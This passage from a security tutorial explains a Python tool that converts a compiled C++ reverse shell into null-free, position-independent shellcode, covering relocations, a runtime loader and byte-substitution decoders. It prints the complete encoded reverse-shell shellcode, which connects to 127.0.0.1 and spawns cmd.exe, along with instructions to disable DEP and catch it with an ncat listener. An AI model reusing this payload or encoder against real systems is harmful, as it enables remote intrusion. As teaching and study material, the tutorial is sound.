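    return int(match.group(1), 16)


sample = """
 0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj
 0001:00000266       _main                      00401266 f   shellcode.obj
 0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj
"""
print(hex(shellcode_length_from_map(sample)))  # 0x266
```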

Here’s how we do it in Python:

extracting the shellcode

This part is very easy. We know the shellcode length and that the shellcode is located at the beginning of the .text section. Here’s the code:

I use the module pefile, which is quite intuitive to use. The relevant part is the body of the if.
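
If you want to experiment with this step on your own, a minimal version could look like the function below. It relies only on the pefile attributes sections, Name and get_data(). The function name and the file name in the comment are assumptions. A stand-in object replaces a real pefile.PE so that the snippet runs without an executable:

```python
from types import SimpleNamespace


def extract_shellcode(pe, length: int) -> bytes:
    """Return the first `length` bytes of the .text section of a pefile.PE object."""
    for section in pe.sections:
        # section names are 8-byte fields padded with null bytes
        if section.Name.rstrip(b"\x00") == b".text":
            return section.get_data()[:length]
    raise ValueError(".text section not found")


# With pefile (file name assumed):
#   import pefile
#   shellcode = extract_shellcode(pefile.PE("shellcode.exe"), 0x266)
# Stand-in object so this snippet runs without an executable:
fake_pe = SimpleNamespace(sections=[
    SimpleNamespace(Name=b".text\x00\x00\x00", get_data=lambda: bytes.fromhex("558bec9090")),
    SimpleNamespace(Name=b".rdata\x00\x00", get_data=lambda: b"cmd.exe\x00"),
])
print(extract_shellcode(fake_pe, 3).hex())  # 558bec
```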

strings and .rdata

As we said before, our C/C++ code may contain strings. For instance, our shellcode contains the following line:

The string cmd.exe is located in the .rdata section, a read-only section containing initialized data. The code refers to that string using an absolute address:

00241152 50                   push        eax  
00241153 8D 44 24 5C          lea         eax,[esp+5Ch]  
00241157 C7 84 24 88 00 00 00 00 01 00 00 mov         dword ptr [esp+88h],100h  
00241162 50                   push        eax  
00241163 52                   push        edx  
00241164 52                   push        edx  
00241165 52                   push        edx  
00241166 6A 01                push        1  
00241168 52                   push        edx  
00241169 52                   push        edx  
0024116A 68 18 21 24 00       push        242118h         <------------------------
0024116F 52                   push        edx  
00241170 89 B4 24 C0 00 00 00 mov         dword ptr [esp+0C0h],esi  
00241177 89 B4 24 BC 00 00 00 mov         dword ptr [esp+0BCh],esi  
0024117E 89 B4 24 B8 00 00 00 mov         dword ptr [esp+0B8h],esi  
00241185 FF 54 24 34          call        dword ptr [esp+34h]

As we can see, the absolute address of the string cmd.exe is 242118h. Note that the address is part of a push instruction and is located at 24116Bh. If we examine our executable file with a hex editor, we see the following:

56A: 68 18 21 40 00           push        000402118h

where 56Ah is the offset in the file. The corresponding virtual address (i.e. in memory) is 40116Ah. The section headers map file offset 56Ah to RVA 116Ah, and the image base is 400000h. (In the debugging session above, the instruction was at 24116Ah because the image was loaded at 240000h.) The image base is the preferred address at which the executable should be loaded in memory. The absolute address in the instruction, 402118h, is correct if the executable is loaded at the preferred base address. However, if the executable is loaded at a different base address, the instruction needs to be fixed. How can the Windows loader know which locations of the executable contain addresses that need to be fixed? The PE file contains a Relocation Directory, which in our case points to the .reloc section. This contains the RVAs of all the locations that need to be fixed.
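
For each relocation entry of type IMAGE_REL_BASED_HIGHLOW (32-bit images), the loader adds the difference between the actual and the preferred base to the DWORD. The Python sketch below applies this fix to the instruction above (68 18 21 40 00) and reproduces the bytes seen in the debugger. The helper name is hypothetical:

```python
import struct


def apply_highlow_relocations(image: bytearray, reloc_offsets, preferred_base: int,
                              actual_base: int) -> None:
    """Add (actual_base - preferred_base) to each DWORD listed in reloc_offsets.

    Offsets are relative to the start of `image`; arithmetic wraps at 32 bits.
    """
    delta = (actual_base - preferred_base) & 0xFFFFFFFF
    for off in reloc_offsets:
        (value,) = struct.unpack_from("<I", image, off)
        struct.pack_into("<I", image, off, (value + delta) & 0xFFFFFFFF)


# push 402118h, assembled for the preferred base 400000h ...
code = bytearray(bytes.fromhex("68 18 21 40 00"))
# ... the relocation entry points at the operand, i.e. byte 1 of the instruction
apply_highlow_relocations(code, [1], 0x400000, 0x240000)
print(code.hex())  # 6818212400, i.e. push 242118h
```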

We can inspect this directory and look for addresses of locations that

  1. are contained in the shellcode (i.e. lie between .text:0 and the start of main, excluded),
  2. contain pointers to data in .rdata.

For example, the Relocation Directory will contain, among many other addresses, the address 40116Bh, which is the location of the last four bytes of the instruction push 402118h. These bytes form the address 402118h, which points to the string cmd.exe contained in .rdata (which starts at address 402000h).

Let’s look at the function get_shellcode_and_relocs. In the first part we extract the .rdata section:

The relevant part is the body of the elif.

In the second part of the same function, we analyze the relocations, find the locations within our shellcode and extract from .rdata the null-terminated strings referenced by those locations.

As we already said, we’re only interested in locations contained in our shellcode. Here’s the relevant part of the function get_shellcode_and_relocs:

pe.DIRECTORY_ENTRY_BASERELOC is a list of data structures, each of which has a field named entries containing a list of relocations. First we check that the current relocation is within the shellcode. If it is, we do the following:

  1. we append to relocs the offset of the relocation relative to the start of the shellcode;
  2. we extract from the shellcode the DWORD located at the offset just found and check that this DWORD points to data in .rdata;
  3. we extract from .rdata the null-terminated string whose starting location we found in (2);
  4. we add the string to addr_to_strings.

Note that:

  1. relocs contains the offsets of the relocations within shellcode, i.e. the offsets of the DWORDs within shellcode that need to be fixed so that they point to the strings;
  2. addr_to_strings is a dictionary that associates the addresses found in (2) above to the actual strings.
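
Here’s a compact Python sketch of the four steps above. It is not the author’s get_shellcode_and_relocs: the function name and parameters are hypothetical, it considers only HIGHLOW entries, and it keeps the terminating null byte of each string. reloc_blocks is meant to be pe.DIRECTORY_ENTRY_BASERELOC, whose entries expose .rva and .type. The demo uses stand-in objects and a made-up .rdata:

```python
import struct
from types import SimpleNamespace

IMAGE_REL_BASED_HIGHLOW = 3  # 32-bit absolute address


def collect_string_relocs(reloc_blocks, text_rva, shellcode, image_base, rdata_rva, rdata):
    """Hypothetical helper: find relocations inside the shellcode that point into .rdata.

    Returns (relocs, addr_to_strings): offsets of the DWORDs to fix, relative to
    the start of the shellcode, and a dict mapping each referenced address to
    its null-terminated string (terminator included).
    """
    relocs, addr_to_strings = [], {}
    rdata_start = image_base + rdata_rva
    rdata_end = rdata_start + len(rdata)
    for block in reloc_blocks:
        for entry in block.entries:
            if entry.type != IMAGE_REL_BASED_HIGHLOW:
                continue                              # e.g. ABSOLUTE padding entries
            offset = entry.rva - text_rva
            if not 0 <= offset <= len(shellcode) - 4:
                continue                              # not inside the shellcode
            (addr,) = struct.unpack_from("<I", shellcode, offset)
            if not rdata_start <= addr < rdata_end:
                continue                              # doesn't point into .rdata
            relocs.append(offset)
            start = addr - rdata_start
            end = rdata.index(b"\x00", start) + 1     # keep the terminator
            addr_to_strings[addr] = rdata[start:end]
    return relocs, addr_to_strings


# Made-up example: .rdata at RVA 0x2000, "cmd.exe" at VA 0x402018, and a
# "push 402018h" at offset 1 of the shellcode (its operand at offset 2).
rdata = bytes(0x18) + b"cmd.exe\x00" + b"more"
shellcode = bytes.fromhex("52 68 18 20 40 00 52")
blocks = [SimpleNamespace(entries=[
    SimpleNamespace(rva=0x1002, type=3),   # inside the shellcode
    SimpleNamespace(rva=0x1500, type=3),   # beyond the shellcode
    SimpleNamespace(rva=0x1000, type=0),   # padding entry
])]
relocs, addr_to_strings = collect_string_relocs(blocks, 0x1000, shellcode, 0x400000, 0x2000, rdata)
print(relocs, addr_to_strings)  # [2] {4202520: b'cmd.exe\x00'}
```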

adding the loader to the shellcode

The idea is to add the strings contained in addr_to_strings to the end of our shellcode and then to make the code in our shellcode reference those strings. Unfortunately, the code-to-strings linking must be done at runtime because we don’t know the starting address of the shellcode. To do this, we need to prepend a sort of “loader” which fixes the shellcode at runtime. After the transformation, our shellcode is made of the loader, the original shellcode and, at the end, the strings strX, plus a table of offsets offX that the loader reads.

offX are DWORDs which point to the locations in the original shellcode that need to be fixed. The loader will fix these locations so that they point to the correct strings strX.

To see exactly how things work, try to understand the following code:

Let’s have a look at the loader:

The first CALL is used to get the absolute address of here in memory. The loader uses this address to fix the locations within the original shellcode. ESI points to off1, so LODSD is used to read the offsets one by one. The instruction

ADD [EDI+EAX], EDI

fixes the locations within the shellcode. EAX is the current offX, which is the offset of the location relative to here. Since EDI holds the absolute address of here, EDI+EAX is the absolute address of that location. The DWORD at that location contains the offset of the correct string relative to here. By adding EDI to that DWORD, we turn it into the absolute address of the string. When the loader has finished, the shellcode, now fixed, is executed.
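
To check the arithmetic, the loop can be emulated in Python. This is a sketch with a toy layout: the label position, offsets and load address are made up, and the code is not the loader’s actual bytes:

```python
import struct


def apply_loader_fixups(blob: bytearray, load_addr: int, here: int, offsets) -> None:
    """Emulate the loader's LODSD / ADD [EDI+EAX], EDI loop.

    blob    -- the transformed shellcode as it sits in memory at load_addr
    here    -- offset of the label 'here' inside blob
    offsets -- the offX values, each relative to 'here'
    """
    edi = (load_addr + here) & 0xFFFFFFFF      # absolute address of 'here'
    for eax in offsets:                        # LODSD: next offX
        pos = here + eax                       # EDI+EAX, as an offset into blob
        (dword,) = struct.unpack_from("<I", blob, pos)
        # the DWORD holds the string's offset relative to 'here';
        # adding EDI turns it into the string's absolute address
        struct.pack_into("<I", blob, pos, (dword + edi) & 0xFFFFFFFF)


# Toy layout: 'here' at offset 5, a DWORD to fix at offset 8 (offX = 3),
# pointing to a string at offset 24, i.e. 19 bytes after 'here'.
blob = bytearray(32)
struct.pack_into("<I", blob, 8, 24 - 5)
apply_loader_fixups(blob, 0x00A30000, here=5, offsets=[3])
print(hex(struct.unpack_from("<I", blob, 8)[0]))  # 0xa30018
```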

To conclude, it should be said that add_loader_to_shellcode is called only if there are relocations. You can see that in the main function:

Removing null-bytes from the shellcode (I)

After relocations, if any, have been handled, it’s time to deal with the null bytes present in the shellcode. As we’ve already said, we need to remove them. To do that, I wrote two functions:

  1. get_fixed_shellcode_single_block
  2. get_fixed_shellcode

The first function doesn’t always work but produces shorter code so it should be tried first. The second function produces longer code but is guaranteed to work.

Let’s start with get_fixed_shellcode_single_block. Here’s the function definition:

The idea is very simple. We analyze the shellcode byte by byte and see if there is a missing value, i.e. a byte value which doesn’t appear anywhere in the shellcode. Let’s say this value is 0x14. We can now replace every 0x00 in the shellcode with 0x14. The shellcode doesn’t contain null bytes anymore, but it can’t run as is because it was modified. The last step is to add some sort of decoder to the shellcode that, at runtime, will restore the null bytes before the original shellcode is executed. You can see that code defined in the array code:

There are a couple of important details to discuss. First of all, this code can’t contain null bytes itself, because then we’d need another piece of code to remove them 🙂

As you can see, the CALL instruction doesn’t jump to here because otherwise its opcode would’ve been

E8 00 00 00 00               #   CALL here

which contains four null bytes. Since the CALL instruction is 5 bytes, CALL here is equivalent to CALL $+5. The trick to get rid of the null bytes is to use CALL $+4:

E8 FF FF FF FF               #   CALL $+4

That CALL jumps to $+4, i.e. to the last FF of the CALL itself. Since the CALL instruction is followed by the byte C0, the instruction executed after the CALL is INC EAX, which is encoded as FF C0. Note that the value pushed by the CALL is still the absolute address of the here label.
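Putting the pieces together, here is a sketch that emits the complete single-block decoder. The function name make_single_block_decoder is hypothetical. The instruction sequence was read back from the first 34 bytes of the sample output at the end of this section rather than taken from the script itself. ADD EDI, 1Dh works because here is 5 bytes into the 34-byte decoder, so EDI ends up pointing just past it.

```python
import struct

def make_single_block_decoder(xor1, xor2, special):
    """Hypothetical helper: the null-restoring decoder placed before the shellcode.

    xor1 ^ xor2 must equal the shellcode length; special is the byte value
    that replaced every 0x00 in the shellcode.
    """
    code = (
        b"\xe8\xff\xff\xff\xff"                    # CALL $+4 ; pushes the address of here
        + b"\xc0"                                  # here: CPU runs FF C0 (INC EAX) from the last FF
        + b"\x5f"                                  # POP EDI ; EDI = here
        + b"\xb9" + struct.pack("<I", xor1)        # MOV ECX, xor1
        + b"\x81\xf1" + struct.pack("<I", xor2)    # XOR ECX, xor2 ; ECX = shellcode length
        + b"\x83\xc7\x1d"                          # ADD EDI, 1Dh ; EDI -> first byte after decoder
        + b"\x33\xf6"                              # XOR ESI, ESI ; ESI = 0
        + b"\xfc"                                  # CLD
        + b"\x8a\x07"                              # MOV AL, [EDI]
        + b"\x3c" + bytes([special])               # CMP AL, special
        + b"\x0f\x44\xc6"                          # CMOVE EAX, ESI ; AL = 0 if it was special
        + b"\xaa"                                  # STOSB ; store AL, EDI++
        + b"\xe2\xf6"                              # LOOP back to MOV AL, [EDI]
    )
    assert len(code) == 5 + 0x1D                   # ADD EDI, 1Dh relies on this size
    return code
```

The result is null-free only if xor1, xor2 and the special byte are themselves null-free, which is what the choices described in this section are meant to guarantee.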

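There’s a second trick in the code to avoid null bytes:

MOV ECX, <xor value 1 for shellcode len>
XOR ECX, <xor value 2 for shellcode len>

We could have just used

MOV ECX, <shellcode len>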

but that would’ve produced null bytes. In fact, for a shellcode of length 0x400, we would’ve had

B9 00 04 00 00        MOV ECX, 400h

which contains 3 null bytes.

To avoid that, we choose a non-null byte which doesn’t appear in 00000400h. Let’s say we choose 0x01. Now we compute

<xor value 1 for shellcode len> = 00000400h xor 01010101h = 01010501h
<xor value 2 for shellcode len> = 01010101h

The net result is that <xor value 1 for shellcode len> and <xor value 2 for shellcode len> are both null-byte free and, when xored, produce the original value 400h.

Our two instructions become:

B9 01 05 01 01        MOV ECX, 01010501h
81 F1 01 01 01 01     XOR ECX, 01010101h

The two xor values are computed by the function get_xor_values.
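The arithmetic above can be reproduced with a small function. This is a sketch of what a helper like get_xor_values might do, not the script's code. The name split_for_xor is hypothetical. Picking the smallest suitable byte is an assumption, though it does reproduce the 01010101h used in the example and in the sample output.

```python
def split_for_xor(value):
    """Hypothetical helper: return (x1, x2), both free of zero bytes, with x1 ^ x2 == value."""
    value_bytes = value.to_bytes(4, "little")
    for b in range(1, 256):
        # A non-zero byte absent from value keeps every byte of value ^ x2 non-zero.
        if b not in value_bytes:
            x2 = b * 0x01010101          # b repeated in all four bytes
            return value ^ x2, x2
    raise ValueError("no suitable byte")  # unreachable: at most 4 candidates are excluded
```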

Having said that, the code is easy to understand: it just walks through the shellcode byte by byte and replaces with a null byte every byte that contains the special value (0x14, in our previous example).
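The encoding side, and the effect of the decoder loop, can be mimicked in Python. This is a hedged sketch with hypothetical names (find_missing_byte, encode_single_block, decode_single_block). Picking the smallest absent value is an arbitrary choice. decode_single_block only reproduces in Python what the x86 loop does in place.

```python
def find_missing_byte(shellcode):
    """Return the smallest non-zero byte value absent from shellcode, or None."""
    present = set(shellcode)
    for b in range(1, 256):
        if b not in present:
            return b
    return None

def encode_single_block(shellcode):
    """Return (special, encoded), or None if every non-zero value is used."""
    special = find_missing_byte(shellcode)
    if special is None:
        return None                      # the multi-block method is needed instead
    return special, shellcode.replace(b"\x00", bytes([special]))

def decode_single_block(encoded, special):
    """Python equivalent of the loop MOV AL,[EDI] / CMP / CMOVE / STOSB / LOOP."""
    return bytes(0 if v == special else v for v in encoded)
```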

Removing null-bytes from the shellcode (II)

The method above can fail because we could be unable to find a byte value which isn’t already present in the shellcode. If that happens, we need to use get_fixed_shellcode, which is a little more complex.

The idea is to divide the shellcode into blocks of 254 bytes. Note that each block must have a “missing byte”: a byte can take 255 non-zero values, but a 254-byte block can contain at most 254 distinct values, so at least one non-zero value doesn’t appear in it. We could choose a missing byte for each block and handle each block individually. But that wouldn’t be very space efficient, because for a shellcode of 254*N bytes we would need to store N “missing bytes” before or after the shellcode (the decoder needs to know the missing bytes). A cleverer approach is to use the same “missing byte” for as many 254-byte blocks as possible. We start from the beginning of the shellcode and keep adding blocks to the current chunk until we run out of missing bytes. When this happens, we remove the last block from the current chunk and begin a new chunk starting from that block. In the end, we will have a list of <missing_byte, num_blocks> pairs:

[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...]

I decided to restrict num_blocksX to a single byte, so num_blocksX is between 1 and 255.
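The greedy splitting described above might look like the following sketch. split_into_chunks is a hypothetical name, and this is not the code of get_fixed_shellcode. It builds each chunk block by block and stops when adding the next block would leave no non-zero value unused. It also caps each chunk at 255 blocks, as stated above. Choosing the smallest unused value is an arbitrary choice.

```python
BLOCK_SIZE = 254

def split_into_chunks(shellcode):
    """Return [(missing_byte, num_blocks), ...] covering the whole shellcode."""
    blocks = [shellcode[i:i + BLOCK_SIZE] for i in range(0, len(shellcode), BLOCK_SIZE)]
    chunks = []
    i = 0
    while i < len(blocks):
        used = set()          # byte values seen so far in the current chunk
        missing = None
        n = 0
        while i + n < len(blocks) and n < 255:
            candidate = used | set(blocks[i + n])
            free = [b for b in range(1, 256) if b not in candidate]
            if not free:      # this block would exhaust the missing bytes
                break
            used, missing = candidate, free[0]
            n += 1
        # n >= 1 always: a single 254-byte block always leaves a value free.
        chunks.append((missing, n))
        i += n
    return chunks
```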

Here’s the part of get_fixed_shellcode which splits the shellcode into chunks:

Like before, we need to discuss the “decoder” which is prepended to the shellcode. This decoder is a bit longer than the previous one but the principle is the same.

Here’s the code:

bytes_blocks is the array

[missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...]

we talked about before, flattened so that it no longer contains pairs.
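The following sketch does three things. It flattens the pairs into bytes_blocks, and it enforces the length limit derived in the next paragraphs (len(bytes_blocks) at most 0x7F - 5). It also emulates in Python what the decoder does with bytes_blocks. All names are hypothetical, and the real decoder is x86 code. Treating the last block of the last chunk as possibly shorter than 254 bytes is an assumption.

```python
BLOCK_SIZE = 254
MAX_BYTES_BLOCKS = 0x7F - 5   # limit on len(bytes_blocks) stated in the text

def flatten(chunks):
    """Turn [(missing_byte, num_blocks), ...] into the flat bytes_blocks array."""
    bytes_blocks = bytes(v for pair in chunks for v in pair)
    if len(bytes_blocks) > MAX_BYTES_BLOCKS:
        raise ValueError("bytes_blocks too long for the JMP SHORT over it")
    return bytes_blocks

def _rewrite(data, bytes_blocks, restore):
    """Walk the chunks, swapping 0x00 and each chunk's missing byte."""
    out = bytearray(data)
    pos = 0
    for k in range(0, len(bytes_blocks), 2):
        missing, num_blocks = bytes_blocks[k], bytes_blocks[k + 1]
        end = min(pos + num_blocks * BLOCK_SIZE, len(out))  # last block may be short
        src, dst = (missing, 0) if restore else (0, missing)
        for i in range(pos, end):
            if out[i] == src:
                out[i] = dst
        pos = end
    return bytes(out)

def encode_chunks(shellcode, bytes_blocks):
    """Replace each null byte with the missing byte of its chunk."""
    return _rewrite(shellcode, bytes_blocks, restore=False)

def decode_chunks(encoded, bytes_blocks):
    """What the decoder does at runtime: turn each missing byte back into 0x00."""
    return _rewrite(encoded, bytes_blocks, restore=True)
```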

Note that the code starts with a JMP SHORT which skips bytes_blocks. For this to work len(bytes_blocks) must be less than or equal to 0x7F. But as you can see, len(bytes_blocks) appears in another instruction as well:

This requires that len(bytes_blocks) is less than or equal to 0x7F – 5, so this is the final condition. This is what happens if the condition is violated:

Let’s review the code in more detail:

Testing the script

This is the easy part! If we run the script without any arguments it says:

Shellcode Extractor by Massimiliano Tomassoli (2015)
 
Usage:
  sce.py <exe file> <map file>

If you remember, we told the linker of VS 2013 to also produce a map file. Just call the script with the path to the exe file and the path to the map file. Here’s what we get for our reverse shell:

Shellcode Extractor by Massimiliano Tomassoli (2015)

Extracting shellcode length from "mapfile"...
shellcode length: 614
Extracting shellcode from "shellcode.exe" and analyzing relocations...
Found 3 reference(s) to 3 string(s) in .rdata
Strings:
  ws2_32.dll
  cmd.exe
  127.0.0.1

Fixing the shellcode...
final shellcode length: 715

char shellcode[] =
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
"\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
"\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
"\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
"\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
"\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
"\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
"\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
"\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
"\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
"\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
"\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
"\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
"\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
"\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
"\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
"\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
"\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
"\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
"\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
"\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
"\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
"\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
"\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
"\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
"\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
"\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
"\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
"\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
"\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
"\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
"\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
"\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
"\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
"\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
"\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
"\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
"\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
"\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
"\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
"\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
"\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
"\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
"\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";

The part about relocations is very important because it lets you check that everything is OK. For example, we know that our reverse shell uses 3 strings and they were all correctly extracted from the .rdata section. We can see that the original shellcode was 614 bytes and the resulting shellcode (after handling relocations and null bytes) is 715 bytes.

Now we need to run the resulting shellcode in some way. The script gives us the shellcode in C/C++ format, so we just need to copy and paste it into a small C/C++ file. Here’s the complete source code:

To make this code work, you need to disable DEP (Data Execution Prevention). Go to Project > <solution name> Properties and then, under Configuration Properties > Linker > Advanced, set Data Execution Prevention (DEP) to No (/NXCOMPAT:NO). This is needed because our shellcode will be executed from the heap, which wouldn’t be executable with DEP activated.

static_assert, introduced with C++11, is used here to check that you use

char shellcode[] = "...";

instead of

char *shellcode = "...";

In the first case, sizeof(shellcode) is the effective length of the shellcode and the shellcode is copied onto the stack. In the second case, sizeof(shellcode) is just the size of the pointer (i.e. 4) and the pointer points to the shellcode in the .rdata section.

To test the shellcode, just open a cmd shell and enter

ncat -lvp 123

Then, run the shellcode and see if it works.


Massimiliano Tomassoli

Computer scientist, software developer, reverse engineer and student of computer security (+ piano player & music composer)
